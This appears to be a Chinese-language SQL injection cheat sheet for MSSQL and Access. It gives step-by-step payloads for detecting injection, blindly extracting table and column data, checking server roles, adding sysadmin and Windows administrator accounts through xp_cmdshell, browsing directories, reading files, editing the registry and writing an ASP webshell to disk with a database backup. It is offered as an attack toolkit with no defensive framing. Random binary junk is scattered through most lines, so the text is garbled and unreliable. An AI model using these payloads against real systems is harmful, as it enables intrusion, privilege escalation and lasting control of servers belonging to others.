1.判断是否有注入;and 1=1 ;and 1=2 6~�Y`<#X5J
2.初步判断是否是mssql ;and user>0 rk� `�]�]
mam(h�{f$�
3.注入参数是字符'and [查询条件] and ''=' Ns-3\~QS�i
�G�T�W��5f
4.搜索时没过滤参数的'and [查询条件] and '%25'=' mk
+B���eK
{�&�h=����
5.判断数据库系统 @qB1:==@7
g��al.<SVW
;and (select count(*) from sysobjects)>0 mssql $u{ �8wF/)
^S^�7���u�
;and (select count(*) from msysobjects)>0 access ��?�Q: �KW
z��g����{�
�1y.!x~Pi,
y�73@t$��|
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �]ChN]�>o�
!}�Ty�"p`
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 w���]Ci%W(
Q".�Am�Hn
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
MU~n�vs;:
m�T�ZgvPJ!
9.(1)猜字段的ascii值(access) I@Y�X-@&7�
#�}zL?�s^G
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 lR3JyYY�{X
�J,^e��q@(
(2)猜字段的ascii值(mssql) 6n'XRfQp)&
?)�XP�Y�<
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 |79n
1;+\?
k&3'[&$I*,
10.测试权限结构(mssql) ��'�q{|�p+
m>-���(c=3
:_+Fe,h>|�
O�\zG�N/!�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- }t.�VH:02y
�D(Yq<%�Q�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- -�_�~T;cj6
6E�r%td)�f
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \:91B�QP
c
]�7��3BJ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- VTxL�BFK;
qGKQrb,K�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- W\�<p`x�Hk
wQ/F���JoB
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��vq�*)�2.
�h�h��"=|c
;and 1=(select IS_MEMBER('db_owner'));-- (Y?"��L_pC
�[<7V�v_\Q
B�$%�7U><'
6"�U�)d7^�
11.添加mssql和系统的帐户 )q��x,>PL�
��w(�vd�a0
;exec master.dbo.sp_addlogin username;-- K~aI�Y0=<�
;exec master.dbo.sp_password null,username,password;-- �t /CE�,DQ
c��d��fvc0
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- &�l NHNu�[
IB����r|�A
;exec master.dbo.xp_cmdshell 'net user username password 4).�>b3OhX
�[vY�? !��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- x'wT%/�hp�
�3re|=_
Hy
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��Z�CS{D�
6�s�|4�'!�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- (@1*�-4��l
��hh>mX6A�
c�kPI^0A�!
� *$o{+YP�
12.(1)遍历目录 xYCX}�bksh
M��/�m�UY
;create table dirs(paths varchar(100), id int) �P(&�9S`�I
@q]�{s+#Xf
;insert dirs exec master.dbo.xp_dirtree 'c:\' T'nQj<dBt:
naoH�685R4
;and (select top 1 paths from dirs)>0 �y!?l�;xMS
DE�kFmmw
�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1V3��7%
�D
���V�_"��K
$zuemjW3p�
_P*<T6\J�>
(2)遍历目录 �s`:�-�6{E
KW.QVBuVO#
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (C�
EXPf�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 4_w+NI�,;
&18CCp\3)c
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 vQpR0IEf]e
�:D�'#CoBA
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 +�B#3��!�
Q}MS ��$[y
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 L���l
!J!{
#�c n�dq[H
A+lP]Oy0S�
Qpc+�1{BQ
13.mssql中的存储过程 //}[(9b'\�
/U#{6zeM[,
xp_regenumvalues 注册表根键, 子键 JS<4%@���
�-S7rOq2Li
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 V_g9��o�R_
{D
jz�']
xp_regread 根键,子键,键值名 -
� z��Q��
t<6`?�\Gk�
;exec xp_regread {IW pI�� *
@�]H:=Q'gj
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �gB\��KD{E
y�jbq�by�7
xp_regwrite 根键,子键, 值名, 值类型, 值 4S]��`�S\w
6NV- &�0 _
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 P�#g"c.�?;
K~_[[)14�b
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 FasA f�(�3
q.OkZI0n��
xp_regdeletevalue 根键,子键,值名 Dm�1;mR�S+
>~5>)yN_a1
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 z L�w=�*��
VR/>V7�*7@
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 J�['paHSF�
5CxD ys�&<
XTH��y
C�K
3JiDi
X�"|
14.mssql的backup创建webshell 1|VnPQ�q�A
Cr��,UP8MO
use model ,?�+�rM �;
"mn�W�qRpX
create table cmd(str image); Z%N�l�<�i�
�DdTTWp/�
insert into cmd(str) values (''); lbv9� kk[�
!TRJsL��8
backup database model to disk='c:\l.asp'; tVZj��tGz=
�xFpMn}�CD
�;�2��vHdN
��
?6!7fs,
15.mssql内置函数 (L?��fYSP!
yFT)�R hN
;and (select @@version)>0 获得Windows的版本号 ����kne{Tp
g�(�\FG���
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 63d'
fgVp
mJu;B3�@
;and (select user_name())>0 爆当前系统的连接用户 &WI�i�w$�@
�GQTMQXn(
;and (select db_name())>0 得到当前连接的数据库 J(0.eD91v�
D��5]�sf>~
�Nw�}y_Qf{
xV'\�2n=1T
16.简洁的webshell ��v�MXS%�Q
}Lx?RU+�@=
use model �;%Jw9�G\h
U3 ����e�3
create table cmd(str image); +k'5�W�1�e
b�m��otR8d
insert into cmd(str) values (''); M$z�.S�0"�
&j,rq?eh$
backup database model to disk='g:\wwwtest\l.asp';
